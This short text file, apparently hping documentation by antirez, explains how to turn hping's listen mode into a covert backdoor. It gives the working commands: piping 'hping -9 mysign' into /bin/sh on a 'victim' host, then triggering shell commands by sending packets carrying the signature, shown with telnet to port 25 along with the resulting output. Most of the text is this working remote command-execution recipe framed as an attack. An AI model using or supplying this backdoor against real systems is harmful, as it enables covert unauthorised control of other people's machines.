38 lines
1.1 KiB
Plaintext
38 lines
1.1 KiB
Plaintext
|
hping can be used as a backdoor. Just try the -9 (--listen) option
|
||
|
and put in pipe with /bin/sh:
|
||
|
|
||
|
Put hping in listen mode in the victim host.
|
||
|
|
||
|
victim# hping -I eth0 -9 mysign | /bin/sh
|
||
|
|
||
|
Every packet that contain "mysign" will be processed by hping,
|
||
|
all the bytes that follows "mysign" in the packet will be dumped
|
||
|
to the standard output, so for example I'll able to exec commands
|
||
|
using all types of protocols. Just for example I can use the smtpd
|
||
|
to exec 'ls' in the victim.
|
||
|
|
||
|
evil$ telnet victim 25
|
||
|
|
||
|
Trying 192.168.1.1...
|
||
|
Connected to nano (192.168.1.1).
|
||
|
Escape character is '^]'.
|
||
|
220 nano.marmoc.net ESMTP Sendmail
|
||
|
mysignls;
|
||
|
|
||
|
on the victim you will see:
|
||
|
|
||
|
victim# hping -I eth0 -9 mysign | /bin/sh
|
||
|
hping2 listen mode
|
||
|
bin cdrom etc home local-home mnt root tmp var
|
||
|
boot dev export lib lost+found proc sbin usr
|
||
|
: command not found
|
||
|
|
||
|
As you can see I used 'ls;' since otherwise the shell will receive
|
||
|
just ls^M. The ";" force the command execution (at least with bash and zsh,
|
||
|
check your shell for more information).
|
||
|
|
||
|
This works with all kind of valid not-filtered IP packets, the higher
|
||
|
level protocl does not matter.
|
||
|
|
||
|
antirez <antirez@invece.org>
|